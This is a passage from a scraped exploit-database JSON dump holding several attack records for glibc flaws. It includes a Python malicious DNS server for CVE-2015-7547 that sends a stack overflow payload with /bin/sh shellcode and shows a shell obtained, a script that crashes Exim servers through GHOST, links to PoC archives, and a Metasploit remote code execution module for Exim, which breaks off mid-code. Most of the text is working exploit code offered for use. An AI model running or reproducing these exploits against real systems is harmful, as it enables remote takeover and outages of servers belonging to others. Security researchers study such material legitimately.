Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\u00ef\u00bf\u00bd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2\r\ndata1_reply\r\ndata2_reply\r\nprocess 6415 is executing new program: /bin/dash\r\n$ id\r\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\r\n$ \r\n \r\n*/\r\n \r\n \r\n \r\n \r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n \r\nIP = '192.168.111.5' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n \r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n \r\n \r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n \r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n \r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n \r\ndef db(x):\r\n return chr(x)\r\n \r\ndef udp_thread():\r\n global terminate\r\n \r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n \r\n reply_counter = 0\r\n counter = -1\r\n \r\n answers = []\r\n \r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n \r\n # Send truncated flag... so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n \r\n answers.append((data, addr))\r\n \r\n if len(answers) != 2:\r\n continue\r\n \r\n counter += 1\r\n \r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n \r\n \r\n print 'udp send '\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n \r\n print 'sendto 1 '\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n print 'sendto 2 '\r\n \r\n sock_udp.close()\r\n \r\n \r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n \r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n \r\n print 'a'\r\n \r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\r\n \r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n \r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n \r\n print 'data1 = ' +data1\r\n \r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n \r\n print 'query = ' + query1\r\n \r\n # Do we have an extra request?\r\n data2 = None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n \r\n \r\n \r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n \r\n \r\n \r\n for i in range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n \r\n data += answer\r\n \r\n data1_reply = dw(len(data)) + data\r\n \r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'A' * (6)\r\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += '\\x90' * (44)\r\n data += '\\x90' * (1955)\r\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\r\n data += '\\x90' * (100)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'F' * (8)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'G' * (134)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n \r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n print 'data1_reply'\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n print 'data2_reply'\r\n \r\n reply_now.clear()\r\n \r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n \r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/24769", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T05:06:57", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2016-02-16T00:00:00", "type": "zdt", "title": "glibc - getaddrinfo Stack Based Buffer Overflow (1)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "id": "1337DAY-ID-25827", "href": "https://0day.today/exploit/description/25827", "sourceData": "Sources: \r\nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\nhttps://github.com/fjserna/CVE-2015-7547\r\n \r\nTechnical information:\r\n \r\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\r\n \r\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\r\n \r\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\r\n \r\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\r\n \r\nWe are providing this code as-is. You are responsible for protecting yourself,\r\nyour property and data, and others from any risks caused by this code. This\r\ncode may cause unexpected and undesirable behavior to occur on your machine.\r\nThis code may not detect the vulnerability on your system.\r\n \r\nNote that this POC consists of two components: server code and client code.\r\nThe server code triggers the vulnerability and therefore will crash the client\r\ncode. Note also that it is necessary to set the nameserver to point to the\r\nserver code, and doing so could cause other programs that call into the\r\ngetaddrinfo() function to crash while testing is underway. This POC code is\r\nprovided \"as is\" with no warranties, whether express or implied, including\r\nwithout limitation any warranties or merchantability, fitness for a particular\r\nuse and noninfringement. Google assumes no responsibility for your proper\r\ninstallation and use of the POC code.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25827", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T20:59:43", "description": "Exim ESTMP denial of service exploit that leverages the GHOST glibc gethostbyname buffer overflow.", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "zdt", "title": "Exim ESMTP GHOST Denial Of Service Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-29T00:00:00", "id": "1337DAY-ID-23215", "href": "https://0day.today/exploit/description/23215", "sourceData": "The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.\r\n\r\n#!/usr/bin/python\r\n# Exim ESMTP DoS Exploit by 1N3 v20150128\r\n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow\r\n# http://crowdshield.com\r\n#\r\n# USAGE: python ghost-smtp-dos.py <ip> <port>\r\n#\r\n# Escape character is '^]'.\r\n# 220 debian-7-7-64b ESMTP Exim 4.80 ...\r\n# HELO\r\n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv)\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/23215", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T07:05:00", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2015-03-19T00:00:00", "type": "zdt", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-03-19T00:00:00", "id": "1337DAY-ID-23392", "href": "https://0day.today/exploit/description/23392", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\r\n 'Description' => %q(\r\n This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based\r\n buffer overflow in the GNU C Library's gethostbyname functions) on x86\r\n and x86_64 GNU/Linux systems that run the Exim mail server. Technical\r\n information about the exploitation can be found in the original GHOST\r\n advisory, and in the source code of this module.\r\n ------------------------------------------------------------------------\r\n SERVER-SIDE REQUIREMENTS (Exim)\r\n ------------------------------------------------------------------------\r\n The remote system must use a vulnerable version of the GNU C Library:\r\n the first exploitable version is glibc-2.6, the last exploitable version\r\n is glibc-2.17; older versions might be exploitable too, but this module\r\n depends on the newer versions' fd_nextsize (a member of the malloc_chunk\r\n structure) to remotely obtain the address of Exim's smtp_cmd_buffer in\r\n the heap.\r\n ------------------------------------------------------------------------\r\n The remote system must run the Exim mail server: the first exploitable\r\n version is exim-4.77; older versions might be exploitable too, but this\r\n module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably\r\n set up the heap as described in the GHOST advisory.\r\n ------------------------------------------------------------------------\r\n The remote Exim mail server must be configured to perform extra security\r\n checks against its SMTP clients: either the helo_try_verify_hosts or the\r\n helo_verify_hosts option must be enabled; the \"verify = helo\" ACL might\r\n be exploitable too, but is unpredictable and therefore not supported by\r\n this module.\r\n ------------------------------------------------------------------------\r\n CLIENT-SIDE REQUIREMENTS (Metasploit)\r\n ------------------------------------------------------------------------\r\n This module's \"exploit\" method requires the SENDER_HOST_ADDRESS option\r\n to be set to the IPv4 address of the SMTP client (Metasploit), as seen\r\n by the SMTP server (Exim); additionally, this IPv4 address must have\r\n both forward and reverse DNS entries that match each other\r\n (Forward-Confirmed reverse DNS).\r\n ------------------------------------------------------------------------\r\n The remote Exim server might be exploitable even if the Metasploit\r\n client has no FCrDNS, but this module depends on Exim's sender_host_name\r\n variable to be set in order to reliably control the state of the remote\r\n heap.\r\n ------------------------------------------------------------------------\r\n TROUBLESHOOTING\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (nil)\" failure: the SENDER_HOST_ADDRESS option\r\n was not specified.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\" failure:\r\n the SENDER_HOST_ADDRESS option was specified, but not in IPv4\r\n dotted-decimal notation.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\" or\r\n \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\" failure: the\r\n SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP\r\n client (Metasploit), as seen by the SMTP server (Exim).\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (no FCrDNS)\" failure: the IPv4 address of the\r\n SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.\r\n ------------------------------------------------------------------------\r\n \"not vuln? old glibc? (no leaked_arch)\" failure: the remote Exim server\r\n is either not vulnerable, or not exploitable (glibc versions older than\r\n glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).\r\n ------------------------------------------------------------------------\r\n \"NUL, CR, LF in addr? (no leaked_addr)\" failure: Exim's heap address\r\n contains bad characters (NUL, CR, LF) and was therefore mangled during\r\n the information leak; this exploit is able to reconstruct most of these\r\n addresses, but not all (worst-case probability is ~1/85, but could be\r\n further improved).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a nil reply, but no shell: the remote\r\n Unix command was executed, but spawned a bind-shell or a reverse-shell\r\n that failed to connect (maybe because of a firewall, or a NAT, etc).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a non-nil reply, and no shell: the\r\n remote Unix command was executed, but failed to spawn the shell (maybe\r\n because the setsid command doesn't exist, or awk isn't gawk, or netcat\r\n doesn't support the -6 or -e option, or telnet doesn't support the -z\r\n option, etc).\r\n ------------------------------------------------------------------------\r\n Comments and questions are welcome!\r\n ),\r\n 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'],\r\n 'License' => BSD_LICENSE,\r\n 'References' => [\r\n ['CVE', '2015-0235'],\r\n ['US-CERT-VU', '967332'],\r\n ['OSVDB', '117579'],\r\n ['BID', '72325'],\r\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']\r\n ],\r\n 'DisclosureDate' => 'Jan 27 2015',\r\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\r\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\r\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^\r\n 'Payload' => {\r\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\r\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\r\n 'DisableNops' => true,\r\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options([\r\n Opt::RPORT(25),\r\n OptAddress.new('SENDER_HOST_ADDRESS', [false,\r\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\r\n ], self.class)\r\n \r\n register_advanced_options([\r\n OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n # for now, no information about the vulnerable state of the target\r\n check_code = Exploit::CheckCode::Unknown\r\n \r\n begin\r\n # not exploiting, just checking\r\n smtp_connect(false)\r\n \r\n # malloc()ate gethostbyname's buffer, and\r\n # make sure its next_chunk isn't the top chunk\r\n \r\n 9.times do\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\r\n smtp_recv(HELO_CODES)\r\n end\r\n \r\n # overflow (4 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x00303030\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\r\n # from now on, an exception means vulnerable\r\n check_code = Exploit::CheckCode::Vulnerable\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n \r\n # realloc()ate gethostbyname's buffer, and\r\n # crash (old glibc) or abort (new glibc)\r\n # on the overwritten size field\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n # a vulnerable target should've crashed by now\r\n check_code = Exploit::CheckCode::Safe\r\n \r\n rescue\r\n peer = \"#{rhost}:#{rport}\"\r\n vprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\")\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n return check_code\r\n end\r\n \r\n def exploit\r\n unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n print_status(\"Checking if target is vulnerable...\")\r\n fail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable\r\n print_good(\"Target is vulnerable.\")\r\n end\r\n information_leak\r\n code_execution\r\n end\r\n \r\n private\r\n \r\n HELO_CODES = '250|451|550'\r\n ANY_CODE = '[0-9]{3}'\r\n \r\n MIN_HEAP_SHIFT = 80\r\n MIN_HEAP_SIZE = 128 * 1024\r\n MAX_HEAP_SIZE = 1024 * 1024\r\n \r\n # Exim\r\n ALIGNMENT = 8\r\n STORE_BLOCK_SIZE = 8192\r\n STOREPOOL_MIN_SIZE = 256\r\n \r\n LOG_BUFFER_SIZE = 8192\r\n BIG_BUFFER_SIZE = 16384\r\n \r\n SMTP_CMD_BUFFER_SIZE = 16384\r\n IN_BUFFER_SIZE = 8192\r\n \r\n # GNU C Library\r\n PREV_INUSE = 0x1\r\n NS_MAXDNAME = 1025\r\n \r\n # Linux\r\n MMAP_MIN_ADDR = 65536\r\n \r\n def information_leak\r\n print_status(\"Trying information leak...\")\r\n leaked_arch = nil\r\n leaked_addr = []\r\n \r\n # try different heap_shift values, in case Exim's heap address contains\r\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\r\n # we'll keep the longest one (the least likely to have been truncated)\r\n \r\n 16.times do\r\n done = catch(:another_heap_shift) do\r\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\r\n print_debug(\"#{{ heap_shift: heap_shift }}\")\r\n \r\n # write the malloc_chunk header at increasing offsets (8-byte step),\r\n # until we overwrite the \"503 sender not yet given\" error message\r\n \r\n 128.step(256, 8) do |write_offset|\r\n error = try_information_leak(heap_shift, write_offset)\r\n print_debug(\"#{{ write_offset: write_offset, error: error }}\")\r\n throw(:another_heap_shift) if not error\r\n next if error == \"503 sender not yet given\"\r\n \r\n # try a few more offsets (allows us to double-check things,\r\n # and distinguish between 32-bit and 64-bit machines)\r\n \r\n error = [error]\r\n 1.upto(5) do |i|\r\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\r\n throw(:another_heap_shift) if not error[i]\r\n end\r\n print_debug(\"#{{ error: error }}\")\r\n \r\n _leaked_arch = leaked_arch\r\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\r\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\r\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\r\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86_64\r\n \r\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\r\n (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd\r\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\r\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86\r\n \r\n else\r\n throw(:another_heap_shift)\r\n end\r\n print_debug(\"#{{ leaked_arch: leaked_arch }}\")\r\n fail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\r\n \r\n # try different large-bins: most of them should be empty,\r\n # so keep the most frequent fd_nextsize address\r\n # (a pointer to the malloc_chunk itself)\r\n \r\n count = Hash.new(0)\r\n 0.upto(9) do |last_digit|\r\n error = try_information_leak(heap_shift, write_offset, last_digit)\r\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\r\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\r\n count[error] += 1\r\n end\r\n print_debug(\"#{{ count: count }}\")\r\n throw(:another_heap_shift) if count.empty?\r\n \r\n # convert count to a nested array of [key, value] arrays and sort it\r\n error_count = count.sort { |a, b| b[1] <=> a[1] }\r\n error_count = error_count.first # most frequent\r\n error = error_count[0]\r\n count = error_count[1]\r\n throw(:another_heap_shift) unless count >= 6 # majority\r\n leaked_addr.push({ error: error, shift: heap_shift })\r\n \r\n # common-case shortcut\r\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\r\n (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\r\n leaked_addr = [leaked_addr.last] # use this one, and not another\r\n throw(:another_heap_shift, true) # done\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n break if done\r\n end\r\n \r\n fail_with(\"infoleak\", \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil?\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\r\n \r\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\r\n leaked_addr = leaked_addr.first # longest\r\n error = leaked_addr[:error]\r\n shift = leaked_addr[:shift]\r\n \r\n leaked_addr = 0\r\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\r\n break if i >= error.length\r\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\r\n end\r\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\r\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\r\n \r\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\r\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\r\n @leaked = { arch: leaked_arch, addr: leaked_addr }\r\n end\r\n \r\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0\r\n fail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0\r\n fail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\r\n \r\n smtp_connect\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\r\n begin # ^ 0x30 | PREV_INUSE\r\n smtp_recv(HELO_CODES)\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(503, 'sender not yet given')\r\n \r\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"DATA\")\r\n reply = smtp_recv(503)\r\n \r\n lines = reply[:lines]\r\n fail if lines.size <= 3\r\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\r\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\r\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\r\n \r\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\r\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\r\n # but happens with lower probability)\r\n \r\n error = lines[+1..-3].join(\"\")\r\n error.sub!(/\\A503-/mn, \"\")\r\n error.sub!(/\\r\\n\\z/mn, \"\")\r\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\r\n return error\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n 